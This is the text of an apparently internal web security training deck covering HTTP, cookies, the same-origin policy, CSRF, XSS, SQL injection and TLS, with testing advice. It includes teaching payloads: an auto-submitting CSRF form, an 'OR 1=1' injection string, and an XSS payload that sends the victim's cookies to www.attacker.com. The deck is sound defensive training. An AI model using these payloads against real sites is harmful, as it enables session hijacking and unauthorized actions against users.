Web Security Training

The Story of the Click

www.salesforce.com

Finding Salesforce.com
Is it in the Browser Cache?

Does the OS know?

www.salesforce.com
Is it in the Router cache?

Does the ISP know?

Recursively query the root

nameserver

Talking to Salesforce.com

www.salesforce.com

TCP

96.43.144.26

Talking to Salesforce.com
GET / HTTP/1.1
Host: www.salesforce.com
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;
q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: unique=true;
Connection: keep-alive

Talking to Salesforce.com
HTTP/1.1 200 OK
Server: SFDC
Vary: Accept-Encoding
Last-Modified: Tue, 08 Apr 2014 22:51:07
GMT
Content-Type: text/html; charset=UTF-8
Date: Tue, 08 Apr 2014 22:51:06 GMT
Content-Length: 120179
[REST OF THE BODY]

What Salesforce.com said

Interpreting what Salesforce.com said

The Story of the Click

Fetch additional resources

www.salesforce.com

Rebuild DOM

Plugins

Complexity

Web Applications are layered and

extremely complex

Abstractions
Abstraction is necessary to
summarize complex
processes into well defined
behaviors and functionality

Roles

Roles are defined to

focus on one or more,
usually adjacent,
abstractions

Roles and
Abstractions
This makes building
complex applications
tractable

Security Issues

Security issues happen within an

abstraction layer or usually as a
result of two or more interacting
layers

Insecure Abstractions
Some abstraction layers, by
design, do not have any
security properties or
guarantees

Security Issues

Incorrect assumptions about

interacting layers or bad
implementations result in
security issues

The Security Mindset

The security mindset is one
that identifies ways to make
processes behave in
unintended insecure ways
across abstractions

The Security Mindset

Finding security bugs
require a understanding of
abstractions, their inherent
security weaknesses and
internalizing how they
interact with other
abstractions

Program Objective
Understand common security issues on
the Salesforce platform
Understand abstraction weaknesses,
behaviors and misconceptions that are
the common causes of security bugs
Hand-on coverage on finding security
issues

Security Essentials Coverage

Web

Browser

Transport

Storage

Security Essentials Coverage

Web

CSRF

XSS
Browser
SQLi

Transport

Insecure
Transport

Storage

Insecure
Storage

Logical

The Web
Abstraction

HyperText Markup Language

Language used for structuring and presenting content for the web

HyperText Markup Language

Consists of Tags that have special meanings

DTD defines elements and their associated attributes and relationships
Supports elements that allow collection of data from users
<form action="/feedme.jsp" method="post">
<input id="POST-name" type="text" name="name">
<input type="submit" value="Save">
</form>

Allows specification of structural semantics

<ol> <li>first item</li> <li>second item</li> <li>third item</li></ol>

Allows embedding of scripts, style sheets and objects

<object data="move.swf" type="application/x-shockwave-flash"></object>
<script type="text/javascript" src="javascript.js">
<link href="style.css" rel="stylesheet" type="text/css" >

Document Object Model

The Document Object Model (DOM) is an application programming interface (API) for valid HTML
and XML documents.
It defines the logical structure of documents and the way a document is accessed and manipulated

Document Object Model

Dynamic HTML

Dynamic HTML
User Input
User Input

User Input

User Input

User Input

User Input

Hands On
HTML
Encoding

Hands On Takeaways
Browsers are very error tolerant
Theres no way for the browser to distinguish data
from code
Special characters must be encoded

HTML Entities
Used to print characters that have a special meaning in HTML
&gt; denotes the greater than sign (>)
&lt; denotes the less than sign (<)
&amp; denotes the ampersand (&)
&quot; denotes double quote (")

HTML Entities
http://dev.w3.org/html5/html-author/charref

HTML Injection
<html>
<body>
Hello there John! You are feeling {%
User Input
=request.getAttribute(mood)%}
You have 5$ in your account
<img src="somthing.gif>
</body>
</html>

HTML Injection
<html>
<body>
Hello there John! You are feeling {%
=request.getAttribute(mood)%}
You have 5$ in your account
<img src="somthing.gif>
</body>
</html>

HTML Injection

hidden iframe

Johns
Browser

HTML Injection

The Uniform Resource Locator

scheme://

login.password@

address

:port

/path

?querystring

#fragment

JavaScript Pseudo-URI

javascript:

do things; // javascript code

Data Pseudo-URI

data:

media type

;base64

uri data

The URL Context

<html>
<body>
Hello there John! You are feeling great!
You have 5$ in your account
<img src="http://www.happy.com?
test=userinput>
User Input
</body>
</html>

URL Encoding

Hyper Text Transfer Protocol

Application level protocol for transmitting hypermedia
documents
Stateless protocol
Request - Response

Request Methods

GET used to retrieve information identified by the request URI (in theory)

POST is the way to trigger an action on the server

PUT is the way to upload a new resource on the server

DELETE removes a resource from the server

OPTIONS is a request for communication options available

TRACE is a kind of ping between the client and the server

GET Request

POST Request

The Referer Header & Leaks by Design

Referer[sic] request-header field allows the client to
specify, for the server's benefit, the address (URI) of the
resource from which the Request-URI was obtained
Clients SHOULD NOT include a Referer header field in a
(non-secure) HTTP request if the referring page was
transferred with a secure protocol - RFC 2616
RFC makes the assumption that all servers that run on a
secure protocol implicitly trust each other

Referer Leakage at Salesforce

If sensitive information is in the URL, it will be leaked
to the requested resource
W-209129

Referer Leakage in Content Domain

W-2189377
Outbound clickable links reveal rendition url via
Referer Header
Much hype because of Dropbox public leak

HTTP Response
Server sends a three digit code indicating status
1XX : Informational Response
2XX : Successful Response
3XX : Redirection Messages
4XX : Client Error
5XX : Server Error
Server sends HTTP response headers
Final block contains the data

HTTP Response

Hands On
HTML &
HTTP
Dissection
with Burp

Hands On Takeaways
Everything can be tampered with
Efficacy of Client side validation
Web applications should not make any assumptions about
input
Dreamforce Hotel Reservation Bug: W-2342203

The
Browser
Abstraction

Cookies
Makes HTTP stateful
Server sends a Set-Cookie Header in the HTTP Response
Set-Cookie: cookie-name=cookie-value;Domain=domain;Path=path;
Expires=date; HttpOnly; Secure
Set-Cookie: sid=some_value; Domain=.salesforce.com; Path=/

Cookies
Key-Value pairs with attributes stored in the browser
Key-Values are sent to every request if Domain and Path
matches in the Cookie Header
Cookie: cookie-name=cookie-value;

Cookie attributes are NOT sent in the request

Cookies
Browser Cookie Jar

key=value; domain=.my.salesforce.com
key=value; domain=na1.my.salesforce.com

*.my.salesforce.com
na1.my.salesforce.com
cs0.my.salesforce.com

na1.my.salesforce.com
(except IE, but lets ignore)

key=value; domain=.salesforce.com

*.salesforce.com
my.salesforce.com
cs0.my.salesforce.com

Cookies
Server can set domain attribute to parent domains except top
level domain (enforced by browser)
Set-Cookie: key=value; domain=.my.salesforce.com
Set-Cookie: key=value;
na1.my.salesforce.com

Set-Cookie: key=value; domain=na1.my.salesforce.com

Set-Cookie: key=value; domain=.com
Set-Cookie: key=value; domain=kid.na1.my.salesforce.com
Set-Cookie: key=value; domain=google.com

Cookies
Server can set domain attribute to parent domains except top level
domain (enforced by browser)
Set-Cookie: key=value; domain=.my.salesforce.com
Set-Cookie: key=value;
na1.my.salesforce.com

Set-Cookie: key=value; domain=na1.my.salesforce.com

Set-Cookie: key=value; domain=.com

tld

Set-Cookie: key=value; domain=kid.na1.my.salesforce.com

Set-Cookie: key=value; domain=.google.com

child domain

not a parent domain

Session Cookie

A server identifies a user (after logging in) by setting a session cookie

Set-Cookie: sessionid=cookie-value;Path=/;Expires=date;
HttpOnly; Secure

This cookie identifies the user (Ambient authority)

Think: Users key to the web application

Cookie Quiz
A web application sets the session cookie value as <username>
after authenticating the user using 2 factor authentication.
Also, the web application displays the image below

Is this Secure?

Cookie Quiz

na1.salesforce.com cannot set cookies with domain attribute

child.na1.salesforce.com. Does this restriction matter?

Cross-Site
Request
Forgery

CSRF
Cookies are sent by the browser for ALL requests, including
cross-domain requests
www.salesforce.com

www.attacker.com

Request

salesforce
cookies

CSRF
An attacker can force a user to make legitimate requests
with attacker supplied parameters to any site
www.salesforce.com

www.attacker.com

Request

salesforce
cookies

CSRF
www.salesforce.com

www.attacker.com

evil XDR to
salesforce.com

il
ev

re

attacker
cookies
User / Browser

st

e
qu

salesforce
cookies

CSRF - GET Request

www.attacker.com

<img src="http://www.salesforce.com/someServlet?doStuff"/>
<a href="http://www.salesforce.com/someServlet?doStuff">click!</a>

CSRF - GET Request

CSRF - POST Request

www.attacker.com

<body onload="document.getElementById('CSRF_form').
submit()">
<form id="CSRF_form" method=POST action="http://www.
salesforce.com/dostuff">
<input type="hidden" name="sendmoney" value="amal"/>
<input type="submit">
</form>
</body>

CSRF
State changing web operations should be accompanied by a
secret that isnt sent automatically like Cookies
These secrets are called CSRF tokens
CSRF tokens are typically included in the DOM
Custom headers with secrets are effective

Testing for CSRF

Identify state changing operations in a feature (If you have to prioritize, start with
the most critical operation)

Intercept operation using a proxy like Burp

Identify the CSRF token in the request (Body element or a Custom Header)

Repeat the request without the token and the operation should fail on proper
implementation (Burp repeater will be covered in the next hand-on)

Alter the value of the token and the operation should fail on proper
implementation

Re-using user As CSRF token (by editing the request) on a different session( A
terminates session and creates a new session Or user Bs session) should
result in failure

The Case Of W-1360276

CSRF

Assume Salesforce uses a unique CSRF token per org. Is

this secure?

CSRF
Are operations that require multiple steps (requests) safe
from CSRF by default?

CSRF

Token should be unique per user per session

Useless, if the server doesnt validate the token

Hands On
Cross-Site
Request
Forgery

JavaScript

Lightweight, interpreted, object-oriented language

Scripting language for the web
<script> element is used to embed or reference an executable script within an HTML or XHTML
document
<script>
2+2 == 5;
</script>

Can manipulate DOM, access client side cookies

allCookies = document.cookie;
alert(allCookies);
document.body.innerHTML = "This is my new body";

Events & Event Handlers

Events are sent to notify code of interesting things that have taken place in the DOM (click,
mouseover)
Event Reference: https://developer.mozilla.org/en-US/docs/Web/Reference/Events

Event handler may refer to

Function of Object registered to be notified of events

Mechanism of registering event listeners via on... attributes or properties in HTML and other
web APIs
<button onclick="alert(this)"> or window.onload = function() { /* ... */ }

Three ways to register event handlers

myButton.addEventListener('click', function(){alert('2+2=5');}, false);

<button onclick="alert('Glory to Ingsoc!')">

myButton.onclick = function(event){alert('Welcome to 0x65');};

Encoding in JavaScript
<script>
var value = {%=userinput%};
var new_value = {%=userinput2%};
</script>

Encoding in JavaScript
Does Javascript encoding work here?

<script>
eval({%=userinput%});
</script>

JavaScript Quiz

Can JavaScript loaded in www.salesforce.com be used to

retrieve cookies belonging to www.google.com?

JavaScript Quiz

Can JavaScript loaded in www.salesforce.com access the

DOM of a page loaded from na1.my.salesforce.com ?

The Same Origin Policy

Restricts how a document or script loaded from one origin

interacts with a resource in another origin

The Same Origin Policy

What is an Origin?
scheme : host : port

The Same Origin Policy

What is an Origin?
http : www.google.com : 80

The Same Origin Policy

These are all different Origins

http : www.salesforce.com : [80]

https : na1.salesforce.com : [443]
https : na1.salesforce.com : [109]
news : www.salesforce.com : [80]

The Same Origin Policy

Can a resource at https://na1.salesforce.com access?
http://www.google.com
https://na1.salesforce.com/something
https://na1--c.na1.content.force.com/profilephoto/729B00Y3V/F
https://eu0.salesfore.ceom/something

The Same Origin Policy

Resource at http://store.company.com/dir/page.html tries to
access:

Cross-Site
Scripting

Code versus Data

Code versus Data in HTML

<html>
<head>
DATA
CODE/CONTROL
</head>
<body>
Outwardly: dumbly, I shamble about, a thing that could never have been
known as human, a thing whose shape is so alien a travesty that humanity
becomes more obscene for the vague resemblance.
<img src=//userdefinedlocation alt=I think onerror=dothings/>
Limp, the body of Gorrister hung from the pink palette; unsupported
hanging high above us in the computer chamber; and it did not shiver in the
chill, oily breeze that blew eternally through the main cavern
<script>
name = Nimdok; eval(alert(name));
</script>

Code versus Data in HTML

<html>
<head>
DATA
CODE/CONTROL
</head>
<body>
Outwardly: dumbly, I shamble about, a thing that could never have been
HTML Context
known as human, a thing whose
shape is so alien a travesty that humanity
becomes more obscene for the vague resemblance.
HTML-Attribute
HTML-URLContext
<img src=//userdefinedlocation
alt=I
think onerror=dothings/>
Context
Limp, the body of Gorrister hung from the pink palette; unsupported
HTML
Context chamber; and it did not shiver in the
hanging high above us in the
computer
chill, oily breeze that blew eternally through the main cavern
<script>
JavaScript
Context
name = Nimdok;
eval(alert(name));
</script>

Cross-site Scripting (XSS)

Untrusted data in a web application is interpreted as

code by the browser
Most common web application vulnerability
Most common vulnerability in Social Cloud
Common kinds of XSS - Reflected, Stored & DOM
based (based on persistence, control/code trigger
time)

Cross-site Scripting (XSS)

What can an attacker do with an XSS?

Reflected XSS
Data from request parameter is reflected in the page without
proper sanitization or appropriate encoding

Reflected XSS
Request: www.vulnapplication.com?userName=me
<html>
<body>
Hello there {%=request.getAttribute
(userName)%}
</body>
</html>

Reflected XSS
Request: www.vulnapplication.com?userName=
<script>AttackerCode</script>
<html>
<body>
Hello there {%=request.getAttribute
(userName)%}
</body>
</html>

Payload to Exfiltrate Cookies

www.vulnapplication.com?userName=<img
src=''onerror="var i=new Image();
i.src='www.attacker.com?pa='+document.cookie;
document.body.appendChild(i);"/>
Try Out

How does the attacker use this

Shortened link in an email
In attacker.coms fancy webpage

Stored XSS

Untrusted data at rest (database, cookies, data file) is reflected

in the page without proper sanitization or appropriate encoding

Stored XSS
Attacker

userName = PAYLOAD

<html>
<body>
Hello there {%=getFromDataBase(userName)%}
</body>
</html>

Stored XSS
Attacker

evilcookie = PAYLOAD

<html>
<body>
Hello there {%=getCookieValue(evilcookie)%}
</body>
</html>

DOM Based XSS

Taxonomy based on trigger time and not delivery
mechanism
Payload is inert when the browser builds the DOM, but
becomes active after changes in the DOM by scripts
Often misunderstood, even by Security Engineers

DOM Based XSS

http://www.vulnerable.com?default=<script>alert(1)</script>

<script>
document.write("document.location.href.
substring(document.location.href.indexOf
("default=")+8)+"</OPTION>");
</script>

Testing for XSS

Identify inputs that the user/attacker can control

Use test strings like <>&;<uniquevalue>/\ (using Burp to bypass client

side checks)

Identify instances where the input appears (searching for uniquevalue)

Identify where the input appears and what characters are encoded

Create input that will result in JavaScript execution

If stuck, talk to Prodsec. We love hard to exploit XSS vectors!

Resources for Testing for XSS

https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_
(OWASP-DV-001)
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_
(OWASP-DV-002)
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Cross-site Scripting
Would replacing all instances of < and > in input solve the
problem?

Remember Set-Cookie?
A server identifies a user (after logging in) by setting a session
cookie
Set-Cookie: sessionid=cookie-value; Path=/;
=date; HttpOnly; Secure
Cookies with HttpOnly flag set cannot be accessed over nonHTTP APIs (JavaScript)

Cross-site Scripting

Would using HttpOnly for all cookies solve the problem?

Hands On
XSS

Blending
Abstractions
Breaking Salesforce
Multi-tenancy

The
Transport
Abstraction

Security Expectations of HTTP

None
Anyone on the network can eavesdrop traffic
Anyone on the network can modify content
Anyone on the network can divert traffic
We were sort of doing all the above with Burp

Secure Sockets Layer

A user visiting a site over HTTP has no assurance that the
user is interacting with the legitimate site
SSL allows a server to authenticate itself to a client and vice
versa

Asymmetric Cryptography

Signatures

Certificates

A certificate is an electronic document used to identify an entity

and to associate that identity with a public key.

Certificate authorities (CAs) are entities that validate identities

and issue certificates

A certificate includes the public key, the name of the entity it

identifies, an expiration date, the name of the CA that issued the
certificate, a serial number, and other information. Most
importantly, a certificate always includes the digital signature of
the issuing CA.

Browsers are pre-loaded with a set of trusted CAs or use the

OS trust store

Certificates

Mixed Content
Whats wrong with this?

https://www.salesforce.com

<script src=http://www.salesforce.com/script.js>

Remember Cookies ?

Will Cookies set by https://www.salesforce.com be sent to http:

//www.salesforce.com?

The Secure Flag

A server identifies a user (after logging in) by setting a session
cookie
Set-Cookie: sessionid=cookie-value; Path=/;
Expires=date; HttpOnly; Secure
If the Secure flag of a cookie is set, it is sent only over HTTPS

The Secure Flag

Same Origin Policy Review

What if we redefine Origin to be?

host : port

Advanced
XSS
Hands On

SQL Injection

SQL Injection
Application

username
password
HTTP GET/POST

SELECT id from users

WHERE username={INPUT.username}
AND password={INPUT.password}

Database
Run as
Application

SQL Injection
Application

'OR 1=1; --"

username
password
HTTP GET/POST

SELECT id from users

WHERE username={INPUT.username}
AND password={INPUT.password}

Database
Run as
Application

SQL Injection
Application

'OR 1=1; --"

username
password
HTTP GET/POST

SELECT id from users

WHERE username=OR 1=1;--
AND password={INPUT.password}

Database
Run as
Application

SQL Injection
Unlike XSS, affects server-side state
Data leakage (confidentiality)
Data loss (integrity)
Application logic bypass (authentication/authorization)

Testing for SQL Injection

https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

Rules for Storage

Sensitive information
(passwords, session cookies,
authentication tokens) must not
be logged
Sensitive information at rest
should always be encrypted
Secrets must not be hardcoded
in source code

What Next?
The Tangled Web by Michael
Zalewski
Find a P0-2 Security bug and well
expense a hard copy

What Next?

OWASP WebGoat
http://webgoat.github.io

What Next?

Security Championship {QE |DEV

}
Prodsec is always hiring
Bug Bounty Programs https://bugcrowd.com/list-of-bug-bounty-programs
Jedi Points https://sites.google.com/a/salesforce.com/trust/jedi-levels
Trust Academy https://trustacademy.salesforce.com/dashboard
(Coming soon)

References

developer.mozilla.org
RFCs
OWASP
Security Essentials deck by Robert
Sussland & Sergey Gobaty
wiki{art,pedia}
Feedback to amal.krishnan@salesforce.com